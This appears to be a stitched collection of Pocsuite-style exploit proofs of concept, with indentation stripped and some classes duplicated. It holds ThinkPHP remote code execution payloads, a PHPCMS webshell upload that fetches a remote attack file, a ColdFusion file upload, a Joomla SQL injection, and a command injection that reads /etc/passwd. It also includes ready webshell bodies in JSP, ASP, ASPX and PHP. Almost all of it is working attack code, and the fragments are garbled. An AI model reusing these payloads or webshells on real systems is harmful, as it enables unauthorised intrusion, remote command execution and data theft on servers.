def _verify(self):
result = {}
url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
username = randomStr(6)
password = randomStr(6, '1234567890')
data = {
"siteid": "1",
"modelid": "1",
"username": "******" % (username),
"password": "******" % (password),
"email": "*****@*****.**" % (username),
"info[content]":
"<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
"dosubmit": "1",
"protocol": "",
}
match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
resp = req.post(url, data=data)
shell = re.findall(match, resp.text)
shellinfo = ''.join(shell[0]) + ".php"
if shell:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
shell_resp = req.get(shellinfo)
if shell_resp.status_code == 200:
result['VerifyInfo']['webshell'] = shellinfo
return self.parse_attack(result)
def _verify(self):
def vul_check(payload):
url = urlparse.urljoin(base_url, payload)
create_verify_file = req.get(url)
get_verify_str = req.get(verify_url)
return get_verify_str
result = {}
base_url = self.url
if (urlparse.urlparse(base_url).port) is None:
base_url = base_url + ":80"
verify_str = randomStr(6)
verify_filename = randomStr(3)
verify_url = urlparse.urljoin(base_url, verify_filename + ".php")
payload_list = [
"index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=<?php echo '{}';?>"
.format(verify_filename, verify_str),
"index.php?s=index/\\think\\template\driver\\file/write?cacheFile={}.php&content=<?php echo '{}';?>"
.format(verify_filename, verify_str)
]
if any(verify_str in vul_check(x) for x in payload_list):
result['VerifyInfo'] = "success"
# result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = self.url
# result['VerifyInfo']['RESULT'] = "success"
return self.parse_output(result)
class JspShell(Webshell):
_keyword = randomStr(20)
_content = '<%@ page import="java.util.*,java.io.*" %>\n' \
'<%@ page import="java.io.*"%>\n' \
'<%@ page import="java.util.*"%>\n' \
'<%\n' \
'if (request.getParameter("check") == "1")\n' \
' out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));\n' \
'if (request.getParameter("{0}") != null)\n' \
'{{\n' \
' Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n' \
' OutputStream os = p.getOutputStream();\n' \
' InputStream in = p.getInputStream();\n' \
' DataInputStream dis = new DataInputStream(in);\n' \
' String disr = dis.readLine();\n' \
' while ( disr != null)\n' \
' {{\n' \
' out.println(disr);\n' \
' disr = dis.readLine();\n' \
' }}\n' \
'\n}}' \
'%>\n'
_password = '******'
_check_data = {'check': '1'}
_keyword = '202c%s4b70' % _keyword
class AspShell(Webshell):
_keyword = randomStr(20)
_password = '******'
_content = '<%eval request("{0}")%>'
_check_statement = 'Response.Write(Replace("202cTEST4b70","TEST",' \
'"' + _keyword + '"))'
_keyword = '202c%s4b70' % _keyword
def _verify(self):
result = {}
self.raw_url = self.url
host = urlparse.urlparse(self.url).hostname
port = urlparse.urlparse(self.url).port
scheme = urlparse.urlparse(self.url).scheme
if port is None:
port = "80"
else:
port = str(port)
if "https" == scheme:
self.url = "%s://%s" % (scheme, host)
else:
self.url = "%s://%s:%s" % (scheme, host, port)
try:
flag = randomStr(10)
check = self.run_cmd("echo${IFS}" + flag).split("\n")[0]
if flag == check:
result["VerifyInfo"] = {}
result["VerifyInfo"]["url"] = self.url
result["VerifyInfo"]["passwd"] = self.run_cmd(
"cat${IFS}%2fetc%2fpasswd")
result["VerifyInfo"]["hosts"] = self.run_cmd(
"cat${IFS}%2fetc%2fhosts")
except Exception as e:
pass
return self.parse_output(result)
def _verify(self):
def vul_check(payload):
url = urlparse.urljoin(base_url, payload)
sock = socket.socket()
sock.connect(("127.0.0.1", 8080))
sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
sock.send('Host: 127.0.0.1\r\n'.encode('ascii'))
sock.send('\r\n'.encode('ascii'))
str_five = 'testssdfsf' * 200
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.close()
get_verify_str = req.get(verify_url)
return get_verify_str
result = {}
base_url = self.url
if (urlparse.urlparse(base_url).port) is None:
base_url = base_url + ":80"
verify_str = randomStr(6)
verify_filename = randomStr(3)
verify_url = urlparse.urljoin(base_url, verify_filename + ".php")
payload_list = [
"index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=%3C?php%20echo%20\'{}\';?%3E"
.format(verify_filename, verify_str),
"index.php?s=index/\\think\\template\driver\\file/write?cacheFile={}.php&content=%3Cphp%20echo%20\'{}\';?%3E"
.format(verify_filename, verify_str)
]
if any(verify_str in vul_check(x) for x in payload_list):
result['VerifyInfo'] = "success"
return self.parse_output(result)
class AspxVerify(VerifyShell):
_keyword = randomStr(20)
_content = '<%@ Page Language="Jscript" ContentType="text/html" ' \
'validateRequest="false" aspcompat="true"%>\n' \
'<%Response.Write("202cTEST4b70".Replace("TEST",' \
'"' + _keyword + '"))%>\n' \
'<%System.IO.File.Delete(Request.PhysicalPath);%>'
_keyword = '202c%s4b70' % _keyword
class AspxShell(Webshell):
_keyword = randomStr(20)
_password = '******'
_content = '<%@ Page Language="Jscript"%>' \
'<%eval(Request.Item["{0}"],"unsafe");%>'
_check_statement = 'Response.Write("202cTEST4b70".Replace("TEST",' \
'"' + _keyword + '"))'
_keyword = '202c%s4b70' % _keyword
class AspVerify(VerifyShell):
_keyword = randomStr(20)
_content = '<%\n' \
'Response.Write(Replace("202cTEST4b70","TEST",' \
'"' + _keyword + '"))\n' \
'CreateObject("Scripting.FileSystemObject").' \
'DeleteFile(Request.ServerVariables("Path_Translated"))\n' \
'%>'
_keyword = '202c%s4b70' % _keyword
def _verify(self):
'''verify mode'''
result = {}
if urlparse(self.url).port is None:
self.url = self.url + ":8500"
url = urljoin(
self.url,
'/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
filename = randomStr(6)
content = randomStr(12)
data = "-----------------------------24464570528145\r\n"
data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format(
filename=filename)
data += "Content-Type: image/jpeg\r\n"
data += "\r\n"
data += "{content}\r\n".format(content=content)
data += "-----------------------------24464570528145\r\n"
data += "Content-Disposition: form-data; name=\"path\"\r\n"
data += "\r\n"
data += "we\r\n"
data += "-----------------------------24464570528145--\r\n"
header = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
"Content-Type":
"multipart/form-data; boundary=---------------------------24464570528145"
}
req.post(url, headers=header, data=data)
file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
file_url = urljoin(self.url, file_path)
response = req.get(file_url)
if content in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Shell'] = file_url
return self.parse_output(result)
class JspVerify(VerifyShell):
_keyword = randomStr(20)
_content = '<%@ page import="java.util.*,java.io.*" %>\n' \
'<%@ page import="java.io.*"%>\n' \
'<%@ page import="java.util.*"%>\n' \
'<%\n' \
'String path=request.getRealPath("")+request.getServletPath();\n' \
'out.println(path);\n' \
'File d=new File(path);\n' \
'if(d.exists()){{\n' \
' d.delete();\n' \
' }}\n' \
'%>\n' \
'<% out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));%>'
_keyword = '202c%s4b70' % _keyword
def _verify(self):
'''verify mode'''
result = {}
joomla_session = req.session()
self.get_pass(joomla_session)
rand_str = randomStr(10, "0123456789")
url = urljoin(self.url,
'/administrator/index.php?option=com_users&view=notes')
sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
randstr=rand_str)
r = joomla_session.post(url=url,
headers=self.headers,
data=sqli_payload)
if r.status_code == 500 and hashlib.md5(
rand_str).hexdigest()[0:31] in r.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
return self.parse_output(result)
def _verify(self):
"""verify mode"""
result = {}
self.url = self.url + '/index.php?s=captcha'
token = randomStr()
cmd = "echo {}".format(token)
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
exploitdata = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': cmd
}
matchstring = 'system error'
resp = req.post(self.url, data=exploitdata, headers=headers)
if matchstring in resp.content.lower() and token in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
class PhpVerify(VerifyShell):
_keyword = randomStr(20)
_content = "<?php var_dump(md5(" + _keyword + "));unlink(__FILE__);?>"
class PhpVerify(VerifyShell):
_keyword = randomStr(20)
_content = '<?php var_dump("202c{0}4b70");unlink(__FILE__);?>'.format(_keyword)
class PhpShell(Webshell):
_keyword = randomStr(20)
_password = '******'
_content = "<?php @assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(' + _keyword + '));'
class PhpShell(Webshell):
_keyword = randomStr(20)
_password = '******'
_content = "<?php @assert($_REQUEST['{0}']);var_dump('202c{1}4b70')?>".format(_password, _keyword)
